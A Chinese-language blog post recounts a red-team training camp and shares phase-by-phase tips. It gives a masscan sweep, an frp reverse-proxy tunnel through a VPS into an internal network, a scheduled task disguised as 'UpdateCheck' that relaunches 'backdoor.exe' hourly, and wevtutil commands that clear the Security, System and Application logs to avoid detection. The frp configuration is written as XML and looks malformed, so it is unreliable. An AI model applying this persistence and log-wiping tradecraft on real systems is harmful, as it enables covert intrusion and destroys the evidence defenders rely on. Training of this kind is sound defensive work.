最近参加了一场攻防演练实战训练营,和一群安全爱好者一起模拟红蓝对抗。说实话,原本以为就是跑跑扫描器、丢丢payload,结果第一天就被打脸——真正攻防中,光靠现成工具根本走不远。
信息收集阶段:别只盯着Nmap
很多人一上来就nmap扫全端口,其实效率很低。我们小组用的是masscan先做快速发现,再用nmap针对性深入。比如先扫出开放80、443的主机:
masscan 192.168.1.0/24 --ports 80,443 --rate=1000拿到结果后配合httpx做标题识别,一眼就能看出哪个是后台登录页,哪个是测试接口。这组合拳比单纯扫IP快得多。
内网渗透:代理链才是王道
拿下一台边界机后,想进内网不能瞎撞。我们搭了frp反向代理,把内网流量通过VPS中转。配置文件这么写:
<configuration>
<serverAddr>vps-ip-address</serverAddr>
<serverPort>7000</serverPort>
<localPort>3389</localPort>
<remotePort>6000</remotePort>
</configuration>这样从外网连6000端口就等于连上了内网机器的远程桌面。整个过程就像搭桥过河,一步错步步错。
权限维持:小工具大作用
有次好不容易提权成功,结果重启后权限丢了。后来学会用Windows计划任务做持久化:
schtasks /create /tn "UpdateCheck" /tr "C:\\temp\\backdoor.exe" /sc hourly /mo 1看着不起眼,但每次系统检查更新时都会悄悄拉起我们的程序。这种细节在训练营里反复被强调:攻击不是炫技,而是让动作自然到不被察觉。
日志清理也要讲策略
刚开始总想着删干净,结果触发了Wazuh告警。后来改用覆盖方式,在目标机上执行:
wevtutil cl Security
wevtutil cl System
wevtutil cl Application清空而不是删除,行为更接近管理员维护操作。教官说,最好的隐藏是让人觉得你从来没出现过。
这场训练营让我明白,系统工具本身不决定强弱,关键是怎么组合使用。就像厨房里的刀,有人只能切菜,有人能雕花。真正的对抗中,拼的是对工具的理解深度,而不是谁手里的武器更酷。